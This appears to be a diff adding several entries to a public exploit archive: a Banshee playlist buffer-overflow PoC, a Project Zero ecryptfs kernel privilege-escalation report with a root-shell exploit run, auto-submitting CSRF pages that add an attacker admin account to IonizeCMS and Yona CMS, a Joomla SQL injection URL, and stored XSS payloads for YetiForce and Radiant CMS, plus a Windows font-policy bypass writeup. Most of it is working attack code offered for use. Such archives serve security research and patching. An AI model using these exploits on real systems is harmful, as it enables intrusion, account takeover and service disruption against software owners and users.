||||
research.
|
||||
|
||||
|
||||
|
||||
11. ABOUT ERPScan
|
||||
|
||||
ERPScan is the most respected and credible Business Application
|
||||
Security provider. Founded in 2010, the company operates globally and
|
||||
enables large Oil and Gas, Financial and Retail organizations to
|
||||
secure their mission-critical processes. Named as an ‘Emerging Vendor’
|
||||
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
|
||||
distinguished by 30+ other awards, ERPScan is the leading SAP SE
|
||||
partner in discovering and resolving security vulnerabilities. ERPScan
|
||||
consultants work with SAP SE in Walldorf to assist in improving the
|
||||
security of their latest solutions.
|
||||
|
||||
ERPScan’s primary mission is to close the gap between technical and
|
||||
business security, and provide solutions to evaluate and secure SAP
|
||||
and Oracle ERP systems and business-critical applications from both,
|
||||
cyber-attacks as well as internal fraud. Usually our clients are large
|
||||
enterprises, Fortune 2000 companies and managed service providers
|
||||
whose requirements are to actively monitor and manage security of vast
|
||||
SAP landscapes on a global scale.
|
||||
|
||||
We ‘follow the sun’ and function in two hubs, located in the Palo Alto
|
||||
and Amsterdam to provide threat intelligence services, agile support
|
||||
and operate local offices and partner network spanning 20+ countries
|
||||
around the globe.
|
|
@ -1,13 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/36953/info
|
||||
|
||||
The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
|
||||
|
||||
Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
|
||||
|
||||
int main()
|
||||
{
|
||||
static long long a[1024 * 1024 * 20] = { 0 };
|
||||
|
||||
return a;
|
||||
|
||||
}
|
172
platforms/linux/dos/39986.py
Executable file
172
platforms/linux/dos/39986.py
Executable file
|
@ -0,0 +1,172 @@
|
|||
'''
|
||||
Title:
|
||||
====
|
||||
|
||||
Banshee 2.6.2 Local Buffer Overflow Vulnerability
|
||||
|
||||
|
||||
Credit:
|
||||
======
|
||||
Name: Ilca Lucian
|
||||
Contact: lucianfilca@gmail.com
|
||||
lucian@pwnthecode.org
|
||||
|
||||
|
||||
CVE:
|
||||
=====
|
||||
|
||||
Unknown (for moment)
|
||||
|
||||
|
||||
Product:
|
||||
=======
|
||||
|
||||
|
||||
Play your music and videos. Keep up with your podcasts and Internet radio.
|
||||
Discover new music and podcasts. Keep your portable device loaded with good
|
||||
stuff.
|
||||
|
||||
Simple enough to enjoy. Powerful enough to thrill. Open source through and
|
||||
through.
|
||||
|
||||
Product link: http://www.banshee.fm
|
||||
|
||||
|
||||
Abstract:
|
||||
=======
|
||||
|
||||
Lucian I. discovered a Local Buffer Overflow vulnerability in Banshee
|
||||
Player 2.6.2 .
|
||||
|
||||
|
||||
Affected Version:
|
||||
=============
|
||||
|
||||
Ver 2.6.2
|
||||
|
||||
|
||||
Date:
|
||||
============
|
||||
19.06.2016
|
||||
|
||||
|
||||
Exploitation-Technique:
|
||||
===================
|
||||
|
||||
Local
|
||||
|
||||
|
||||
Severity Rating:
|
||||
===================
|
||||
|
||||
4.4
|
||||
|
||||
|
||||
Details:
|
||||
=======
|
||||
Vulnerability Description : Banshee Media Player is vulnerable to buffer
|
||||
overflow vulnerability.The software performs operations on a memory buffer,
|
||||
but it can read from or write to a memory location that is outside of the
|
||||
intended boundary of the buffer.Certain languages allow direct addressing
|
||||
of memory locations and do not automatically ensure that these locations
|
||||
are valid for the memory buffer that is being referenced. This can cause
|
||||
read or write operations to be performed on memory locations that may be
|
||||
associated with other variables, data structures, or internal program data.
|
||||
|
||||
Impact : Banshee 2.6.2 is prone to a local buffer-overflow vulnerability
|
||||
because the application fails to perform adequate boundary checks on
|
||||
user-supplied input. Specifically, this issue occurs when opening a '.mp3'
|
||||
playlist file that contains excessive data.
|
||||
|
||||
Attackers may leverage this issue to execute remote buffer overflow or
|
||||
inject arbitrary code in the context of the application. Failed attacks
|
||||
will cause denial-of-service conditions.
|
||||
|
||||
Path Log:
|
||||
|
||||
type=PATH msg=audit(1466452858.351:14): item=0 name="/usr/bin/banshee"
|
||||
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
||||
nametype=NORMAL
|
||||
type=PROCTITLE msg=audit(1466452858.351:14):
|
||||
proctitle=64656275676673002F7573722F62696E2F62616E73686565
|
||||
type=SYSCALL msg=audit(1466452858.351:15): arch=c000003e syscall=2
|
||||
success=yes exit=3 a0=7fffd6ed664f a1=80000 a2=ffffffff a3=ca items=1
|
||||
ppid=16021 pid=9458 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0
|
||||
egid=0 sgid=0 fsgid=0 tty=pts0 ses=4294967295 comm="debugfs"
|
||||
exe="/sbin/debugfs" key=(null)
|
||||
type=CWD msg=audit(1466452858.351:15): cwd="/root/Downloads"
|
||||
type=PATH msg=audit(1466452858.351:15): item=0 name="/usr/bin/banshee"
|
||||
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
||||
nametype=NORMAL
|
||||
type=PROCTITLE msg=audit(1466452858.351:15):
|
||||
proctitle=64656275676673002F7573722F62696E2F62616E73686565
|
||||
type=SYSCALL msg=audit(1466453064.143:16): arch=c000003e syscall=59
|
||||
success=yes exit=0 a0=126cb9f4 a1=adb4f30 a2=12b5d0c0 a3=593 items=3 ppid=1
|
||||
pid=9559 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0
|
||||
tty=tty2 ses=1 comm="banshee" exe="/usr/bin/env" key=(null)
|
||||
type=EXECVE msg=audit(1466453064.143:16): argc=5 a0="/usr/bin/env"
|
||||
a1="bash" a2="/usr/bin/banshee" a3="--redirect-log" a4="--play-enqueued"
|
||||
type=CWD msg=audit(1466453064.143:16): cwd="/root"
|
||||
type=PATH msg=audit(1466453064.143:16): item=0 name="/usr/bin/banshee"
|
||||
inode=17568145 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
||||
nametype=NORMAL
|
||||
type=PATH msg=audit(1466453064.143:16): item=1 name="/usr/bin/env"
|
||||
inode=17567018 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
|
||||
nametype=NORMAL
|
||||
type=PATH msg=audit(1466453064.143:16): item=2
|
||||
name="/lib64/ld-linux-x86-64.so.2" inode=9047695 dev=08:01 mode=0100755
|
||||
ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
|
||||
type=PROCTITLE msg=audit(1466453064.143:16):
|
||||
proctitle=2F7573722F62696E2F656E760062617368002F7573722F62696E2F62616E73686565002D2D72656469726563742D6C6F67002D2D706C61792D656E717565756564
|
||||
type=SYSCALL msg=audit(1466453064.159:17): arch=c000003e syscall=2
|
||||
success=yes exit=3 a0=16b4268 a1=0 a2=0 a3=8 items=1 ppid=1 pid=9559 auid=0
|
||||
uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=tty2 ses=1
|
||||
comm="bash" exe="/bin/bash" key=(null)
|
||||
type=CWD msg=audit(1466453064.159:17): cwd="/root"
|
||||
|
||||
|
||||
|
||||
Error report image link :
|
||||
|
||||
https://postimg.org/image/x0x8raw2v/
|
||||
|
||||
|
||||
Prerequisites:
|
||||
======================
|
||||
|
||||
The attacker needs to entice victims to perform an action in order to
|
||||
exploit this vulnerability.
|
||||
|
||||
|
||||
Proof Of Concept:
|
||||
================
|
||||
|
||||
|
||||
POC Exploit code:
|
||||
'''
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
A = "\x41"
|
||||
|
||||
p0c = 'A' * 7550
|
||||
|
||||
generate = "dos.mp3"
|
||||
file = open(generate , "w")
|
||||
file.write(p0c)
|
||||
file.close()
|
||||
|
||||
|
||||
'''
|
||||
Risk:
|
||||
=====
|
||||
|
||||
The security risk of the Local Buffer Overflow Vulnerability is estimated
|
||||
as moderate.
|
||||
|
||||
|
||||
Credits:
|
||||
=======
|
||||
|
||||
Lucian Ilca
|
||||
'''
|
217
platforms/linux/local/39992.txt
Executable file
217
platforms/linux/local/39992.txt
Executable file
|
@ -0,0 +1,217 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836
|
||||
|
||||
Stacking filesystems, including ecryptfs, protect themselves against
|
||||
deep nesting, which would lead to kernel stack overflow, by tracking
|
||||
the recursion depth of filesystems. E.g. in ecryptfs, this is
|
||||
implemented in ecryptfs_mount() as follows:
|
||||
|
||||
s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
|
||||
|
||||
rc = -EINVAL;
|
||||
if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
|
||||
pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
|
||||
goto out_free;
|
||||
}
|
||||
|
||||
|
||||
The files /proc/$pid/{mem,environ,cmdline}, when read, access the
|
||||
userspace memory of the target process, involving, if necessary,
|
||||
normal pagefault handling. If it was possible to mmap() them, an
|
||||
attacker could create a chain of e.g. /proc/$pid/environ mappings
|
||||
where process 1 has /proc/2/environ mapped into its environment area,
|
||||
process 2 has /proc/3/environ mapped into its environment area and so
|
||||
on. A read from /proc/1/environ would invoke the pagefault handler for
|
||||
process 1, which would invoke the pagefault handler for process 2 and
|
||||
so on. This would, again, lead to kernel stack overflow.
|
||||
|
||||
|
||||
One interesting fact about ecryptfs is that, because of the encryption
|
||||
involved, it doesn't just forward mmap to the lower file's mmap
|
||||
operation. Instead, it has its own page cache, maintained using the
|
||||
normal filemap helpers, and performs its cryptographic operations when
|
||||
dirty pages need to be written out or when pages need to be faulted
|
||||
in. Therefore, not just its read and write handlers, but also its mmap
|
||||
handler only uses the lower filesystem's read and write methods.
|
||||
This means that using ecryptfs, you can mmap [decrypted views of]
|
||||
files that normally wouldn't be mappable.
|
||||
|
||||
Combining these things, it is possible to trigger recursion with
|
||||
arbitrary depth where:
|
||||
|
||||
a reading userspace memory access in process A (from userland or from
|
||||
copy_from_user())
|
||||
causes a pagefault in an ecryptfs mapping in process A, which
|
||||
causes a read from /proc/{B}/environ, which
|
||||
causes a pagefault in an ecryptfs mapping in process B, which
|
||||
causes a read from /proc/{C}/environ, which
|
||||
causes a pagefault in an ecryptfs mapping in process C, and so on.
|
||||
|
||||
On systems with the /sbin/mount.ecryptfs_private helper installed
|
||||
(e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked
|
||||
during installation), this bug can be triggered by an unprivileged
|
||||
user. The mount helper considers /proc/$pid, where $pid is the PID of
|
||||
a process owned by the user, to be a valid mount source because the
|
||||
directory is "owned" by the user.
|
||||
|
||||
I have attached both a generic crash PoC and a build-specific exploit
|
||||
that can be used to gain root privileges from a normal user account on
|
||||
Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version
|
||||
4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu
|
||||
SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".
|
||||
|
||||
dmesg output of the crasher:
|
||||
|
||||
```
|
||||
[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
|
||||
[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
|
||||
[ 80.040028] PGD 1e0d067 PUD 0
|
||||
[ 80.040028] Thread overran stack, or stack corrupted
|
||||
[ 80.040028] Oops: 0000 [#1] SMP
|
||||
[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
|
||||
[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
|
||||
[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
|
||||
[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
|
||||
[ 80.040028] RIP: 0010:[<ffffffff810c9a33>] [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
|
||||
[ 80.040028] RSP: 0000:ffff88021fc03d70 EFLAGS: 00010046
|
||||
[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
|
||||
[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
|
||||
[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
|
||||
[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
|
||||
[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
|
||||
[ 80.040028] FS: 00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
|
||||
[ 80.040028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
|
||||
[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
|
||||
[ 80.040028] Stack:
|
||||
[ 80.040028] ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
|
||||
[ 80.040028] ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
|
||||
[ 80.040028] ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
|
||||
[ 80.040028] Call Trace:
|
||||
[ 80.040028] <IRQ>
|
||||
[ 80.040028] [<ffffffff810b4b83>] update_curr+0xe3/0x160
|
||||
[ 80.040028] [<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
|
||||
[ 80.040028] [<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
|
||||
[ 80.040028] [<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
|
||||
[ 80.040028] [<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
|
||||
[ 80.040028] [<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
|
||||
[ 80.040028] [<ffffffff810ee961>] update_process_times+0x51/0x60
|
||||
[ 80.040028] [<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
|
||||
[ 80.040028] [<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
|
||||
[ 80.040028] [<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
|
||||
[ 80.040028] [<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
|
||||
[ 80.040028] [<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
|
||||
[ 80.040028] [<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
|
||||
[ 80.040028] [<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
|
||||
[ 80.040028] <EOI>
|
||||
[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d
|
||||
[ 80.040028] RIP [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
|
||||
[ 80.040028] RSP <ffff88021fc03d70>
|
||||
[ 80.040028] CR2: fffffffe4b9145c0
|
||||
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
|
||||
[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
|
||||
[ 80.040028] ---[ end trace 616e3de50958c35b ]---
|
||||
[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
|
||||
[ 80.040028] Shutting down cpus with NMI
|
||||
[ 80.040028] Kernel Offset: disabled
|
||||
[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
|
||||
```
|
||||
|
||||
example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:
|
||||
|
||||
```
|
||||
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
|
||||
compile.sh exploit.c hello.c suidhelper.c
|
||||
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh
|
||||
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
|
||||
compile.sh exploit exploit.c hello hello.c suidhelper suidhelper.c
|
||||
user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
|
||||
all spammers ready
|
||||
recurser parent ready
|
||||
spam over
|
||||
fault chain set up, faulting now
|
||||
writing stackframes
|
||||
stackframes written
|
||||
killing 2494
|
||||
post-corruption code is alive!
|
||||
children should be dead
|
||||
coredump handler set. recurser exiting.
|
||||
going to crash now
|
||||
suid file detected, launching rootshell...
|
||||
we have root privs now...
|
||||
root@user-VirtualBox:/proc# id
|
||||
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
|
||||
```
|
||||
|
||||
(If the exploit crashes even with the right kernel version, try
|
||||
restarting the machine. Also, ensure that no program like top/htop/...
|
||||
is running that might try to read process command lines. Note that
|
||||
the PoC and the exploit don't really clean up after themselves and
|
||||
leave mountpoints behind that prevent them from re-running without
|
||||
a reboot or manual unmounting.)
|
||||
|
||||
Note that Ubuntu compiled their kernel with
|
||||
CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used
|
||||
to be in the past to not crash the kernel while exploiting this bug,
|
||||
and an overwrite of addr_limit would be useless because at the
|
||||
time the thread_info is overwritten, there are multiple instances of
|
||||
kernel_read() on the stack. Still, the bug is exploitable by carefully
|
||||
aligning the stack so that the vital components of thread_info are
|
||||
preserved, stopping with an out-of-bounds stack pointer and
|
||||
overwriting the thread stack using a normal write to an adjacent
|
||||
allocation of the buddy allocator.
|
||||
|
||||
Regarding the fix, I think the following would be reasonable:
|
||||
|
||||
- Explicitly forbid stacking anything on top of procfs by setting its
|
||||
s_stack_depth to a sufficiently large value. In my opinion, there
|
||||
is too much magic going on inside procfs to allow stacking things
|
||||
on top of it, and there isn't any good reason to do it. (For
|
||||
example, ecryptfs invokes open handlers from a kernel thread
|
||||
instead of normal user process context, so the access checks inside
|
||||
VFS open handlers are probably ineffective - and procfs relies
|
||||
heavily on those.)
|
||||
|
||||
- Forbid opening files with f_op->mmap==NULL through ecryptfs. If the
|
||||
lower filesystem doesn't expect to be called in pagefault-handling
|
||||
context, it probably shouldn't be called in that context.
|
||||
|
||||
- Create a dedicated kernel stack cache outside of the direct mapping
|
||||
of physical memory that has a guard page (or a multi-page gap) at
|
||||
the bottom of each stack, and move the struct thread_info to a
|
||||
different place (if nothing else works, the top of the stack, above
|
||||
the pt_regs).
|
||||
While e.g. race conditions are more common than stack overflows in
|
||||
the Linux kernel, the whole vulnerability class of stack overflows
|
||||
is easy to mitigate, and the kernel is sufficiently complicated for
|
||||
unbounded recursion to emerge in unexpected places - or perhaps
|
||||
even for someone to discover a way to create a stack with a bounded
|
||||
length that is still too high. Therefore, I believe that guard
|
||||
pages are a useful mitigation.
|
||||
Nearly everywhere, stack overflows are caught using guard pages
|
||||
nowadays; this includes Linux userland, but also {### TODO ###}
|
||||
and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).
|
||||
|
||||
Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`
|
||||
in schedule_debug() ought to be a direct panic instead of an oops. At
|
||||
the moment, when you hit it, you get a recursion between the scheduler
|
||||
invocation in do_exit() and the BUG_ON in the scheduler, and the
|
||||
kernel recurses down the stack until it hits something sufficiently
|
||||
important to cause a panic.
|
||||
|
||||
I'm going to send (compile-tested) patches for my first two fix
|
||||
suggestions and the recursive oops bug. I haven't written a patch for
|
||||
the guard pages mitigation - I'm not familiar enough with the x86
|
||||
subsystem for that.
|
||||
|
||||
|
||||
Notes regarding the exploit:
|
||||
|
||||
It makes an invalid assumption that causes it to require at least around 6GB of RAM.
|
||||
|
||||
It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.
|
||||
|
||||
The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip
|
||||
|
38
platforms/php/webapps/39987.html
Executable file
38
platforms/php/webapps/39987.html
Executable file
|
@ -0,0 +1,38 @@
|
|||
<!--
|
||||
# Exploit Title: IonizeCMS <= 1.0.8 Remote Admin Add CSRF Exploit
|
||||
# Exploit Author: s0nk3y
|
||||
# Google Dork: -
|
||||
# Date: 21/06/2016
|
||||
# Vendor Homepage: http://ionizecms.com/
|
||||
# Software Link: https://github.com/ionize/ionize/archive/1.0.8.1.zip
|
||||
# Version: 1.0.8
|
||||
# Tested on: Ubuntu 16.04
|
||||
|
||||
IonizeCMS is vulnerable to CSRF attack (No CSRF token in place) meaning
|
||||
that if an admin user can be tricked to visit a crafted URL created by
|
||||
attacker (via spear phishing/social engineering), a form will be submitted
|
||||
to (http://localhost/en/admin/user/save) that will add a
|
||||
new user as administrator.
|
||||
Once exploited, the attacker can login to the admin panel (
|
||||
http://localhost/en/admin/auth/login)
|
||||
using the username and the password he posted in the form.
|
||||
|
||||
CSRF PoC Code
|
||||
=============
|
||||
-->
|
||||
|
||||
<form method="post" action="http://localhost/en/admin/user/save">
|
||||
<input type="hidden" name="id_user"/>
|
||||
<input type="hidden" name="join_date"/>
|
||||
<input type="hidden" name="salt"/>
|
||||
<input type="hidden" name="from"/>
|
||||
<input type="hidden" name="username" value="attacker">
|
||||
<input type="hidden" name="screen_name" value="attacker">
|
||||
<input type="hidden" name="email" value="attacker@email.com"/>
|
||||
<input type="hidden" name="id_role" value="2"/>
|
||||
<input type="hidden" name="password" value="attackerPassword"/>
|
||||
<input type="hidden" name="password2" value="attackerPassword"/>
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
34
platforms/php/webapps/39988.html
Executable file
34
platforms/php/webapps/39988.html
Executable file
|
@ -0,0 +1,34 @@
|
|||
<!--
|
||||
# Exploit Title: Yona CMS <= 1.3.x Remote Admin Add CSRF Exploit
|
||||
# Exploit Author: s0nk3y
|
||||
# Google Dork: -
|
||||
# Date: 21/06/2016
|
||||
# Vendor Homepage: http://yonacms.com
|
||||
# Software Link: https://github.com/oleksandr-torosh/yona-cms/
|
||||
# Version: 1.3.x
|
||||
# Tested on: Ubuntu 16.04
|
||||
|
||||
Yona CMS is vulnerable to CSRF attack (No CSRF token in place) meaning
|
||||
that if an admin user can be tricked to visit a crafted URL created by
|
||||
attacker (via spear phishing/social engineering), a form will be submitted
|
||||
to (http://localhost/admin/admin-user/add) that will add a
|
||||
new user as administrator.
|
||||
Once exploited, the attacker can login to the admin panel (
|
||||
http://localhost/admin)
|
||||
using the username and the password he posted in the form.
|
||||
|
||||
CSRF PoC Code
|
||||
=============
|
||||
-->
|
||||
|
||||
<form method="post" action="http://localhost/admin/admin-user/add">
|
||||
<input type="hidden" name="login" value="attacker"/>
|
||||
<input type="hidden" name="email" value="attacker@email.com"/>
|
||||
<input type="hidden" name="name" value="attacker"/>
|
||||
<input type="hidden" name="role" value="admin"/>
|
||||
<input type="hidden" name="password" value="attackerPassword"/>
|
||||
<input type="hidden" name="active"/>
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
17
platforms/php/webapps/39989.txt
Executable file
17
platforms/php/webapps/39989.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: Joomla com_publisher component SQL Injection vulnerability
|
||||
# Exploit Author: s0nk3y
|
||||
# Date: 21-06-2016
|
||||
# Software Link: http://extensions.joomla.org/extension/publisher-pro
|
||||
# Category: webapps
|
||||
# Version: All
|
||||
# Tested on: Ubuntu 16.04
|
||||
|
||||
1. Description
|
||||
Publisher Pro is the ultimate publishing platform for Joomla, turning your
|
||||
site into a professional news portal or a magazine that people want to read!
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Itemid Parameter Vulnerable To SQL Injection
|
||||
|
||||
http://server/index.php?option=com_publisher&view=issues&Itemid=[SQLI]&lang=en
|
19
platforms/php/webapps/39998.txt
Executable file
19
platforms/php/webapps/39998.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: YetiForce CRM < 3.1 - Persistant XSS Vulnerability
|
||||
# Exploit Author: David Silveiro
|
||||
# Exploit Author Github: github.com/davidsilveiro
|
||||
# Exploit Author Twitter: twitter.com/david_silveiro
|
||||
# Vendor Homepage: https://yetiforce.com/
|
||||
# Software Link: http://sourceforge.net/projects/yetiforce/
|
||||
# Date: Fixed on 20th June 2016
|
||||
|
||||
YetiForce CRM was built on a rock-solid Vtiger foundation, but has hundreds of changes that help to accomplish even the most challenging tasks in the simplest way
|
||||
|
||||
YetiForce is vulnerable to a stored XSS vulnerability present within a users comment section.
|
||||
|
||||
POC:
|
||||
|
||||
Within 'Companies & Accounts > Accounts' select your prefered user, and then in the 'Comments' section input;
|
||||
|
||||
<img src=x onerror=alert('XSS');>
|
||||
|
||||
Either refresh the current page, or navigate back to 'Accounts'
|
37
platforms/ruby/webapps/39997.txt
Executable file
37
platforms/ruby/webapps/39997.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Radiant CMS 1.1.3 - Mutiple Persistant XSS Vulnerabilities
|
||||
# Exploit Author: David Silveiro
|
||||
# Exploit Author Github: github.com/davidsilveiro
|
||||
# Exploit Author Twitter: twitter.com/david_silveiro
|
||||
# Vendor Homepage: http://radiantcms.org/
|
||||
# Software Link: http://radiantcms.org/download/
|
||||
# Date: Zero day
|
||||
|
||||
Radiant is a no-fluff, open source content management system designed for small teams. It is similar to Textpattern or MovableType, but is a general purpose content management system (not just a blogging engine) written in Ruby.
|
||||
|
||||
Stored XSS 1 – File Title Upload
|
||||
|
||||
The attacker must first be a user of sorts, as there's only 2 types of roles 'administrator' & 'designer' we're going with the assumption of the latter. Now as the designer we have the option to upload 'assets' such as files or images, here lyes one of the issues.
|
||||
|
||||
When uploading, we're presented with the option to create a title for an image, which gets displayed back in the general repository where a user logged in as admin would also be able to see it. We're able to input our own javascript within this field, thus when a you then visit the 'assets' page, you will be presented with a pop up.
|
||||
|
||||
Enter the example below.
|
||||
|
||||
POC:
|
||||
|
||||
Title: </script>alert('XSS')</script>
|
||||
|
||||
|
||||
Stored XSS 2 – User Personal Preferences
|
||||
|
||||
This time round were faced with a lot more avenues to have our JS displayed back to us. Again, we're going with the assumption that we're logged in as a designer user.
|
||||
|
||||
Let us navigate to the 'Settings page', where you'll see 2 options to edit Personal Preferences & Configuration, click on Edit Prefrences.
|
||||
|
||||
POC:
|
||||
|
||||
Name: <script>alert('XSS 1')</script>
|
||||
Email Address: <script>alert('XSS2')</script>@gmail.com
|
||||
Username: <script>alert('XSS3')</script>
|
||||
|
||||
This will not only reflect back to you, as the designer, but also the back to the admin when he/she goes onto the http://127.0.0.1/admin/users/ and is presented with our users malicious 'NAME' parameter.
|
||||
|
54
platforms/win32/dos/39993.txt
Executable file
54
platforms/win32/dos/39993.txt
Executable file
|
@ -0,0 +1,54 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=779
|
||||
|
||||
Windows: Custom Font Disable Policy Bypass
|
||||
Platform: Windows 10 Only
|
||||
Class: Security Feature Bypass
|
||||
|
||||
Summary:
|
||||
It’s possible to bypass the ProcessFontDisablePolicy check in win32k to load a custom font from an arbitrary file on disk even in a sandbox. This might be used as part of a chain to elevate privileges. If anything this is really a useful demonstration that you probably really want to shutdown the object manager directory shadowing as part of the sandbox mitigations, even if you don’t fix the explicit bypass.
|
||||
|
||||
Description:
|
||||
|
||||
The Process Mitigation policy ProcessFontDisablePolicy disables loading fonts from memory or by a path other than in the system fonts directory. This is probably mostly redundant with the introduction of the User Mode Font Driver, although there’s some interesting additional attack surface if you could compromise that process (it is running with a locked down DACL to prevent people attacking it, presumably). Also while UMFD runs in an AppContainer it might be less restrictive than other sandboxes providing a limited sandbox escape (again to just open up additional attack surface).
|
||||
|
||||
The issue is due to a race condition in the check which looks similar to the following:
|
||||
|
||||
int WIN32K::bLoadFont(...) {
|
||||
int load_option = GetCurrentProcessFontLoadingOption();
|
||||
bool system_font = true;
|
||||
if (load_option) {
|
||||
HANDLE hFile = hGetHandleFromFilePath(FontPath); <- First open of path
|
||||
BOOL system_font = bIsFileInSystemFontsDir(hFile); <- Should return True
|
||||
ZwClose(hFile);
|
||||
if (!system_font) {
|
||||
LogFontLoadAttempt(FontPath);
|
||||
if (load_option == 2)
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
// Switch out path here
|
||||
HANDLE hFont = hGetHandleFromFilePath(FontPath); <- Will open our custom font
|
||||
// Map font as section
|
||||
}
|
||||
|
||||
There’s a clear race between opening the font and checking its location and then re-opening it again to map the file as a section for processing. If you could make the first check open a file in the system font directory then it’d pass the check. If you then switch out the font for your custom one it’ll load that instead. Previously I’d do this using symbolic links, such as mount points or object manager links but that’s pretty much no longer available in sandboxes anymore. So instead I’ve abused object manager directory shadows again. You can construct a native NT path in such a way that it will first open a system font file, then using a oplock to win the race we can switch the directory object to point to our custom font on disk.
|
||||
|
||||
